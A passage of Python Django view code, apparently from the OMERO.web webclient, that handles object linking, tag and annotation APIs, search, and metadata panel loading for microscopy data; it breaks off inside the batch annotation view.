def get_objects_owners(conn, child_type, child_ids):
"""
Returns a dict of child_id: owner_id
"""
if child_type == "tag":
child_type = "Annotation"
owners = {}
for obj in conn.getObjects(child_type, child_ids):
owners[obj.id] = obj.details.owner.id.val
return owners
@login_required()
def api_links(request, conn=None, **kwargs):
"""
Entry point for the api_links methods.
We delegate depending on request method to
create or delete links between objects.
"""
if request.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON data to update links"}, status=405
)
# Handle link creation/deletion
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
if request.method == "POST":
return _api_links_POST(conn, json_data)
elif request.method == "DELETE":
return _api_links_DELETE(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
"""Creates links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
When creating a link, fails silently if ValidationException
(E.g. adding an image to a Dataset that already has that image).
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
linksToSave = []
write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
user_id = conn.getUserId()
for parent_type, parents in json_data.items():
if parent_type in ("orphaned", "experimenter"):
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
# batch look-up owners of all child objects
child_owners = get_objects_owners(conn, child_type, child_ids)
for child_id in child_ids:
parent_id = int(parent_id)
link = create_link(parent_type, parent_id, child_type, child_id)
if link and link != "orphan":
# link owner should match child owner
if write_owned and child_owners[child_id] != user_id:
link.details.owner = ExperimenterI(
child_owners[child_id], False
)
linksToSave.append(link)
if len(linksToSave) > 0:
# Need to set context to correct group (E.g parent group)
ptype = parent_type.title()
if ptype in ["Tagset", "Tag"]:
ptype = "TagAnnotation"
try:
p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
except omero.ValidationException:
return JsonResponse(
{"error": "Object of type %s and ID %s not found" % (ptype, parent_id)},
status=404,
)
logger.info("api_link: Saving %s links" % len(linksToSave))
try:
# We try to save all at once, for speed.
conn.saveArray(linksToSave)
response["success"] = True
except Exception:
logger.info(
"api_link: Exception on saveArray with %s links" % len(linksToSave)
)
# If this fails, e.g. ValidationException because link
# already exists, try to save individual links
for link in linksToSave:
try:
conn.saveObject(link)
except Exception:
pass
response["success"] = True
return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
"""Deletes links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
objLnks = get_object_links(
conn, parent_type, parent_id, child_type, child_ids
)
if objLnks is None:
continue
linkType, links = objLnks
linkIds = [r.id.val for r in links]
logger.info("api_link: Deleting %s links" % len(linkIds))
conn.deleteObjects(linkType, linkIds, wait=True)
# webclient needs to know what is orphaned
linkType, remainingLinks = get_object_links(
conn, parent_type, None, child_type, child_ids
)
# return remaining links in same format as json above
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for rl in remainingLinks:
pid = rl.parent.id.val
cid = rl.child.id.val
# Deleting links still in progress above - ignore these
if pid == int(parent_id):
continue
if parent_type not in response:
response[parent_type] = {}
if pid not in response[parent_type]:
response[parent_type][pid] = {child_type: []}
response[parent_type][pid][child_type].append(cid)
# If we got here, DELETE was OK
response["success"] = True
return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
"""
Get a list of links as
{'data': [{id: 12, child:{type:'image', id:1},
parent:{type:'dataset', id:2}] }
Supports ?image=1,2 and ?image=1&image=2
"""
parent_types = {"image": "dataset", "dataset": "project", "plate": "screen"}
parents = []
for child_type, parent_type in parent_types.items():
ids = request.GET.getlist(child_type)
if len(ids) == 0:
continue
# support for ?image=1,2
child_ids = []
for id in ids:
for i in id.split(","):
child_ids.append(i)
link_type, result = get_object_links(
conn, parent_type, None, child_type, child_ids
)
for link in result:
parents.append(
{
"id": link.id.val,
"parent": {"type": parent_type, "id": link.parent.id.val},
"child": {"type": child_type, "id": link.child.id.val},
}
)
return JsonResponse({"data": parents})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
"""
This finds the paths to objects in the hierarchy. It returns only
the path, not the object hierarchy itself.
An example usage is for the 'show' functionality
Example to go to the image with id 1 somewhere in the tree.
http://localhost:8000/webclient/?show=image-1
This method can tell the webclient exactly what needs to be
dynamically loaded to display this in the jstree.
"""
try:
experimenter_id = get_long_or_default(request, "experimenter", None)
project_id = get_long_or_default(request, "project", None)
dataset_id = get_long_or_default(request, "dataset", None)
image_id = get_long_or_default(request, "image", None)
screen_id = get_long_or_default(request, "screen", None)
plate_id = get_long_or_default(request, "plate", None)
acquisition_id = get_long_or_default(request, "run", None)
# acquisition will override 'run' if both are specified as they are
# the same thing
acquisition_id = get_long_or_default(request, "acquisition", acquisition_id)
well_id = request.GET.get("well", None)
tag_id = get_long_or_default(request, "tag", None)
tagset_id = get_long_or_default(request, "tagset", None)
roi_id = get_long_or_default(request, "roi", None)
shape_id = get_long_or_default(request, "shape", None)
group_id = get_long_or_default(request, "group", None)
page_size = get_long_or_default(request, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if tag_id is not None or tagset_id is not None:
paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
else:
paths = paths_to_object(
conn,
experimenter_id,
project_id,
dataset_id,
image_id,
screen_id,
plate_id,
acquisition_id,
well_id,
group_id,
page_size,
roi_id,
shape_id,
)
return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
if request.method == "GET":
return api_tags_and_tagged_list_GET(request, conn, **kwargs)
elif request.method == "DELETE":
return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
"""Get a list of tags
Specifiying tag_id will return any sub-tags, sub-tagsets and
objects tagged with that id
If no tagset_id is specifed it will return tags which have no
parent
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
tag_id = get_long_or_default(request, "id", None)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
date = get_bool_or_default(request, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get ALL data (all owners) under specified tags
if tag_id is not None:
tagged = tree.marshal_tagged(
conn=conn,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
load_pixels=load_pixels,
date=date,
limit=limit,
)
else:
tagged = {}
# Get 'tags' under tag_id
tagged["tags"] = tree.marshal_tags(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
"""Delete the listed tags by ids"""
# Get parameters
try:
tag_ids = get_longs(request, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
dcs = list()
handle = None
try:
for tag_id in tag_ids:
dcs.append(omero.cmd.Delete("/Annotation", tag_id))
doall = omero.cmd.DoAll()
doall.requests = dcs
handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
try:
conn._waitOnCmd(handle)
finally:
handle.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def api_annotations(request, conn=None, **kwargs):
r = request.GET
image_ids = get_list(request, "image")
dataset_ids = get_list(request, "dataset")
project_ids = get_list(request, "project")
screen_ids = get_list(request, "screen")
plate_ids = get_list(request, "plate")
run_ids = get_list(request, "acquisition")
well_ids = get_list(request, "well")
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", ANNOTATIONS_LIMIT)
ann_type = r.get("type", None)
ns = r.get("ns", None)
anns, exps = tree.marshal_annotations(
conn,
project_ids=project_ids,
dataset_ids=dataset_ids,
image_ids=image_ids,
screen_ids=screen_ids,
plate_ids=plate_ids,
run_ids=run_ids,
well_ids=well_ids,
ann_type=ann_type,
ns=ns,
page=page,
limit=limit,
)
return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member_id", -1)
owner_id = get_long_or_default(request, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Like with api_container_list, this is a combination of
# results which will each be able to return up to the limit in page
# size
try:
# Get the shares
shares = tree.marshal_shares(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
# Get the discussions
discussions = tree.marshal_discussions(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
"""
This loads data for the center panel, via AJAX calls.
Used for Datasets, Plates & Orphaned Images.
"""
# get index of the plate
index = getIntOrDefault(request, "index", 0)
# prepare data. E.g. kw = {} or {'plate': 301L} or
# 'acquisition': 301L}
kw = dict()
if o1_type is not None:
if o1_id is not None and int(o1_id) > 0:
kw[str(o1_type)] = long(o1_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
# prepare forms
form_well_index = None
context = {"manager": manager, "form_well_index": form_well_index, "index": index}
# load data & template
template = None
if "plate" in kw or "acquisition" in kw:
fields = manager.getNumberOfFields()
if fields is not None:
form_well_index = WellIndexForm(initial={"index": index, "range": fields})
if index == 0:
index = fields[0]
# Show parameter will be well-1|well-2
show = request.GET.get("show")
if show is not None:
wells_to_select = []
for w in show.split("|"):
if "well-" in w:
wells_to_select.append(w.replace("well-", ""))
context["select_wells"] = ",".join(wells_to_select)
context["baseurl"] = reverse("webgateway").rstrip("/")
context["form_well_index"] = form_well_index
context["index"] = index
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
template = "webclient/data/plate.html"
if o1_type == "acquisition":
context["acquisition"] = o1_id
context["isLeader"] = conn.isLeader()
context["template"] = template
return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
"""
Get the potential groups we can move selected data to.
These will be groups that the owner(s) of selected objects is a member of.
Objects are specified by query string like: ?Image=1,2&Dataset=3
If no selected objects are specified, simply list the groups that the
current user is a member of.
Groups list will exclude the 'current' group context.
"""
ownerIds = []
currentGroups = set()
groupSets = []
groups = {}
owners = {}
for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
oids = request.GET.get(dtype, None)
if oids is not None:
for o in conn.getObjects(dtype, oids.split(",")):
ownerIds.append(o.getDetails().owner.id.val)
currentGroups.add(o.getDetails().group.id.val)
ownerIds = list(set(ownerIds))
# In case we were passed no objects or they weren't found
if len(ownerIds) == 0:
ownerIds = [conn.getUserId()]
for owner in conn.getObjects(
"Experimenter", ownerIds, opts={"load_experimentergroups": True}
):
# Each owner has a set of groups
gids = []
owners[owner.id] = owner.getFullName()
for group in owner.copyGroupExperimenterMap():
groups[group.parent.id.val] = group.parent
gids.append(group.parent.id.val)
groupSets.append(set(gids))
# Can move to groups that all owners are members of...
targetGroupIds = set.intersection(*groupSets)
# ...but not 'user' group
userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
if userGroupId in targetGroupIds:
targetGroupIds.remove(userGroupId)
# if all the Objects are in a single group, exclude it from the target
# groups
if len(currentGroups) == 1:
curr_grp = currentGroups.pop()
if curr_grp in targetGroupIds:
targetGroupIds.remove(curr_grp)
def getPerms(group):
p = group.getDetails().permissions
return {
"write": p.isGroupWrite(),
"annotate": p.isGroupAnnotate(),
"read": p.isGroupRead(),
}
# From groupIds, create a list of group dicts for json
targetGroups = []
for gid in targetGroupIds:
targetGroups.append(
{"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
)
targetGroups.sort(key=lambda x: x["name"])
owners = [[k, v] for k, v in owners.items()]
return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
"""Loads a tree for user to pick target Project, Dataset or Screen"""
# filter by group (not switching group)
conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
owner = getIntOrDefault(request, "owner", None)
manager = BaseContainer(conn)
manager.listContainerHierarchy(owner)
template = "webclient/data/chgrp_target_tree.html"
context = {"manager": manager, "target_type": target_type, "template": template}
return context
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
"""
Handles AJAX calls to search
"""
manager = BaseSearch(conn)
foundById = []
# form = 'form' if we are searching. Get query from request...
r = request.GET
if form is not None:
query_search = r.get("query", None)
if query_search is None:
return HttpResponse("No search '?query' included")
query_search = query_search.replace("+", " ")
advanced = toBoolean(r.get("advanced"))
# If this is an advanced search use 'advanced_search' for query
if advanced:
query_search = r.get("advanced_search")
template = "webclient/search/search_details.html"
onlyTypes = r.getlist("datatype")
fields = r.getlist("field")
searchGroup = r.get("searchGroup", None)
ownedBy = r.get("ownedBy", None)
useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
startdate = r.get("startdateinput", None)
startdate = startdate is not None and smart_str(startdate) or None
enddate = r.get("enddateinput", None)
enddate = enddate is not None and smart_str(enddate) or None
date = None
if startdate is not None:
if enddate is None:
n = datetime.datetime.now()
enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
date = "%s_%s" % (startdate, enddate)
# by default, if user has not specified any types:
if len(onlyTypes) == 0:
onlyTypes = ["images"]
# search is carried out and results are stored in
# manager.containers.images etc.
manager.search(
query_search,
onlyTypes,
fields,
searchGroup,
ownedBy,
useAcquisitionDate,
date,
rawQuery=advanced,
)
# if the query is only numbers (separated by commas or spaces)
# we search for objects by ID
isIds = re.compile(r"^[\d ,]+$")
if isIds.search(query_search) is not None:
conn.SERVICE_OPTS.setOmeroGroup(-1)
idSet = set()
for queryId in re.split(" |,", query_search):
if len(queryId) == 0:
continue
try:
searchById = long(queryId)
if searchById in idSet:
continue
idSet.add(searchById)
for t in onlyTypes:
t = t[0:-1] # remove 's'
if t in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
obj = conn.getObject(t, searchById)
if obj is not None:
foundById.append({"otype": t, "obj": obj})
except ValueError:
pass
else:
# simply display the search home page.
template = "webclient/search/search.html"
context = {
"manager": manager,
"foundById": foundById,
"resultCount": manager.c_size + len(foundById),
}
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This page is the right-hand panel 'general metadata', first tab only.
Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
The data and annotations are loaded by the manager. Display of appropriate
data is handled by the template.
"""
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
context = dict()
# we only expect a single object, but forms can take multiple objects
images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
datasets = (
c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
)
projects = (
c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
)
screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
acquisitions = (
c_type == "acquisition"
and list(conn.getObjects("PlateAcquisition", [c_id]))
or list()
)
shares = (
(c_type == "share" or c_type == "discussion")
and [conn.getShare(c_id)]
or list()
)
wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
# we simply set up the annotation form, passing the objects to be
# annotated.
selected = {
"images": c_type == "image" and [c_id] or [],
"datasets": c_type == "dataset" and [c_id] or [],
"projects": c_type == "project" and [c_id] or [],
"screens": c_type == "screen" and [c_id] or [],
"plates": c_type == "plate" and [c_id] or [],
"acquisitions": c_type == "acquisition" and [c_id] or [],
"wells": c_type == "well" and [c_id] or [],
"shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
}
initial = {
"selected": selected,
"images": images,
"datasets": datasets,
"projects": projects,
"screens": screens,
"plates": plates,
"acquisitions": acquisitions,
"wells": wells,
"shares": shares,
}
form_comment = None
figScripts = None
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
form_comment = CommentAnnotationForm(initial=initial)
else:
try:
manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
except AttributeError as x:
return handlerInternalError(request, x)
if share_id is not None:
template = "webclient/annotations/annotations_share.html"
context["share"] = BaseShare(conn, share_id)
else:
template = "webclient/annotations/metadata_general.html"
context["canExportAsJpg"] = manager.canExportAsJpg(request)
context["annotationCounts"] = manager.getAnnotationCounts()
figScripts = manager.listFigureScripts()
context["manager"] = manager
if c_type in ("tag", "tagset"):
context["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if form_comment is not None:
context["form_comment"] = form_comment
context["figScripts"] = figScripts
context["template"] = template
context["webclient_path"] = reverse("webindex")
return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This is the image 'Preview' tab for the right-hand panel.
"""
context = {}
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
if share_id:
context["share"] = BaseShare(conn, share_id)
if c_type == "well":
manager.image = manager.well.getImage(index)
allRdefs = manager.image.getAllRenderingDefs()
rdefs = {}
rdefId = manager.image.getRenderingDefId()
# remove duplicates per user
for r in allRdefs:
ownerId = r["owner"]["id"]
r["current"] = r["id"] == rdefId
# if duplicate rdefs for user, pick one with highest ID
if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
rdefs[ownerId] = r
rdefs = rdefs.values()
# format into rdef strings,
# E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
rdefQueries = []
for r in rdefs:
chs = []
for i, c in enumerate(r["c"]):
act = "-"
if c["active"]:
act = ""
color = c["lut"] if "lut" in c else c["color"]
reverse = "r" if c["inverted"] else "-r"
chs.append(
"%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
)
rdefQueries.append(
{
"id": r["id"],
"owner": r["owner"],
"c": ",".join(chs),
"m": r["model"] == "greyscale" and "g" or "c",
}
)
max_w, max_h = conn.getMaxPlaneSize()
size_x = manager.image.getSizeX()
size_y = manager.image.getSizeY()
context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
context["manager"] = manager
context["rdefsJson"] = json.dumps(rdefQueries)
context["rdefs"] = rdefs
context["template"] = "webclient/annotations/metadata_preview.html"
return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
"""
This loads the ancestors of the specified object and displays them in a
static tree.
Used by an AJAX call from the metadata_general panel.
"""
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
context = {"manager": manager}
context["template"] = "webclient/annotations/metadata_hierarchy.html"
return context
@login_required()
@render_response()
def load_metadata_acquisition(
request, c_type, c_id, conn=None, share_id=None, **kwargs
):
"""
The acquisition tab of the right-hand panel. Only loaded for images.
TODO: urls regex should make sure that c_type is only 'image' OR 'well'
"""
try:
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
else:
template = "webclient/annotations/metadata_acquisition.html"
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
except AttributeError as x:
return handlerInternalError(request, x)
form_environment = None
form_objective = None
form_microscope = None
form_instrument_objectives = list()
form_stageLabel = None
form_filters = list()
form_dichroics = list()
form_detectors = list()
form_channels = list()
form_lasers = list()
lasertypes = list(conn.getEnumerationEntries("LaserType"))
arctypes = list(conn.getEnumerationEntries("ArcType"))
filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
# various enums we need for the forms (don't load unless needed)
mediums = None
immersions = None
corrections = None
if c_type == "image":
if share_id is None:
manager.companionFiles()
manager.channelMetadata()
for theC, ch in enumerate(manager.channel_metadata):
logicalChannel = ch.getLogicalChannel()
if logicalChannel is not None:
channel = dict()
channel["form"] = MetadataChannelForm(
initial={
"logicalChannel": logicalChannel,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
conn.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
conn.getEnumerationEntries("ContrastMethodI")
),
"modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
},
auto_id=False,
)
# 9853 Much metadata is not available to 'shares'
if share_id is None:
lightPath = logicalChannel.getLightPath()
if lightPath is not None:
channel["form_dichroic"] = None
channel["form_excitation_filters"] = list()
channel["form_emission_filters"] = list()
lightPathDichroic = lightPath.getDichroic()
if lightPathDichroic is not None:
channel["form_dichroic"] = MetadataDichroicForm(
initial={"dichroic": lightPathDichroic}
)
filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
for f in lightPath.getEmissionFilters():
channel["form_emission_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
for f in lightPath.getExcitationFilters():
channel["form_excitation_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
detectorSettings = logicalChannel.getDetectorSettings()
if (
detectorSettings._obj is not None
and detectorSettings.getDetector()
):
channel["form_detector_settings"] = MetadataDetectorForm(
initial={
"detectorSettings": detectorSettings,
"detector": detectorSettings.getDetector(),
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(conn.getEnumerationEntries("Binning")),
}
)
lightSourceSettings = logicalChannel.getLightSourceSettings()
if (
lightSourceSettings is not None
and lightSourceSettings._obj is not None
):
lightSrc = lightSourceSettings.getLightSource()
if lightSrc is not None:
lstypes = lasertypes
if lightSrc.OMERO_CLASS == "Arc":
lstypes = arctypes
elif lightSrc.OMERO_CLASS == "Filament":
lstypes = filamenttypes
channel["form_light_source"] = MetadataLightSourceForm(
initial={
"lightSource": lightSrc,
"lightSourceSettings": lightSourceSettings,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
conn.getEnumerationEntries("PulseI")
),
}
)
# TODO: We don't display filter sets here yet since they are
# not populated on Import by BioFormats.
channel["label"] = ch.getLabel()
color = ch.getColor()
channel["color"] = color is not None and color.getHtml() or None
planeInfo = (
manager.image
and manager.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
plane_info = []
for pi in planeInfo:
deltaT = pi.getDeltaT(units="SECOND")
exposure = pi.getExposureTime(units="SECOND")
if deltaT is None and exposure is None:
continue
if deltaT is not None:
deltaT = deltaT.getValue()
if exposure is not None:
exposure = exposure.getValue()
plane_info.append(
{"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
)
channel["plane_info"] = plane_info
form_channels.append(channel)
try:
image = manager.well.getWellSample().image()
except Exception:
image = manager.image
if share_id is None: # 9853
if image.getObjectiveSettings() is not None:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
form_objective = MetadataObjectiveSettingsForm(
initial={
"objectiveSettings": image.getObjectiveSettings(),
"objective": image.getObjectiveSettings().getObjective(),
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
}
)
if image.getImagingEnvironment() is not None:
form_environment = MetadataEnvironmentForm(initial={"image": image})
if image.getStageLabel() is not None:
form_stageLabel = MetadataStageLabelForm(initial={"image": image})
instrument = image.getInstrument()
if instrument is not None:
if instrument.getMicroscope() is not None:
form_microscope = MetadataMicroscopeForm(
initial={
"microscopeTypes": list(
conn.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": instrument.getMicroscope(),
}
)
objectives = instrument.getObjectives()
for o in objectives:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
obj_form = MetadataObjectiveForm(
initial={
"objective": o,
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
},
auto_id=False,
)
form_instrument_objectives.append(obj_form)
filters = list(instrument.getFilters())
if len(filters) > 0:
for f in filters:
form_filter = MetadataFilterForm(
initial={
"filter": f,
"types": list(
conn.getEnumerationEntries("FilterTypeI")
),
},
auto_id=False,
)
form_filters.append(form_filter)
dichroics = list(instrument.getDichroics())
for d in dichroics:
form_dichroic = MetadataDichroicForm(
initial={"dichroic": d}, auto_id=False
)
form_dichroics.append(form_dichroic)
detectors = list(instrument.getDetectors())
if len(detectors) > 0:
for d in detectors:
form_detector = MetadataDetectorForm(
initial={
"detectorSettings": None,
"detector": d,
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
},
auto_id=False,
)
form_detectors.append(form_detector)
lasers = list(instrument.getLightSources())
if len(lasers) > 0:
for laser in lasers:
lstypes = lasertypes
if laser.OMERO_CLASS == "Arc":
lstypes = arctypes
elif laser.OMERO_CLASS == "Filament":
lstypes = filamenttypes
form_laser = MetadataLightSourceForm(
initial={
"lightSource": laser,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(conn.getEnumerationEntries("PulseI")),
},
auto_id=False,
)
form_lasers.append(form_laser)
# TODO: remove this 'if' since we should only have c_type = 'image'?
context = {"manager": manager, "share_id": share_id}
if c_type not in ("share", "discussion", "tag"):
context["form_channels"] = form_channels
context["form_environment"] = form_environment
context["form_objective"] = form_objective
context["form_microscope"] = form_microscope
context["form_instrument_objectives"] = form_instrument_objectives
context["form_filters"] = form_filters
context["form_dichroics"] = form_dichroics
context["form_detectors"] = form_detectors
context["form_lasers"] = form_lasers
context["form_stageLabel"] = form_stageLabel
context["template"] = template
return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
context = {
"template": "webclient/annotations/original_metadata.html",
"imageId": image.getId(),
}
try:
om = image.loadOriginalMetadata()
if om is not None:
context["original_metadata"] = om[0]
context["global_metadata"] = om[1]
context["series_metadata"] = om[2]
except omero.LockTimeout:
# 408 is Request Timeout
return HttpResponse(content="LockTimeout", status=408)
return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
"""
Prepare objects for use in the annotation forms.
These objects are required by the form superclass to populate hidden
fields, so we know what we're annotating on submission
"""
r = request.GET or request.POST
images = (
len(r.getlist("image")) > 0
and list(conn.getObjects("Image", r.getlist("image")))
or list()
)
datasets = (
len(r.getlist("dataset")) > 0
and list(conn.getObjects("Dataset", r.getlist("dataset")))
or list()
)
projects = (
len(r.getlist("project")) > 0
and list(conn.getObjects("Project", r.getlist("project")))
or list()
)
screens = (
len(r.getlist("screen")) > 0
and list(conn.getObjects("Screen", r.getlist("screen")))
or list()
)
plates = (
len(r.getlist("plate")) > 0
and list(conn.getObjects("Plate", r.getlist("plate")))
or list()
)
acquisitions = (
len(r.getlist("acquisition")) > 0
and list(conn.getObjects("PlateAcquisition", r.getlist("acquisition")))
or list()
)
shares = (
len(r.getlist("share")) > 0 and [conn.getShare(r.getlist("share")[0])] or list()
)
wells = (
len(r.getlist("well")) > 0
and list(conn.getObjects("Well", r.getlist("well")))
or list()
)
return {
"image": images,
"dataset": datasets,
"project": projects,
"screen": screens,
"plate": plates,
"acquisition": acquisitions,
"well": wells,
"share": shares,
}
def getIds(request):
"""
Used by forms to indicate the currently selected objects prepared above
"""
r = request.GET or request.POST
selected = {
"images": r.getlist("image"),
"datasets": r.getlist("dataset"),
"projects": r.getlist("project"),
"screens": r.getlist("screen"),
"plates": r.getlist("plate"),
"acquisitions": r.getlist("acquisition"),
"wells": r.getlist("well"),
"shares": r.getlist("share"),
}
return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
"""
This page gives a form for batch annotation.
Local File form and Comment form are loaded. Other forms are loaded via
AJAX
"""
objs = getObjects(request, conn)
# get groups for selected objects - setGroup() and create links
obj_ids = []
obj_labels = []
groupIds = set()
annotationBlocked = False
for key in objs:
obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
for o in objs[key]:
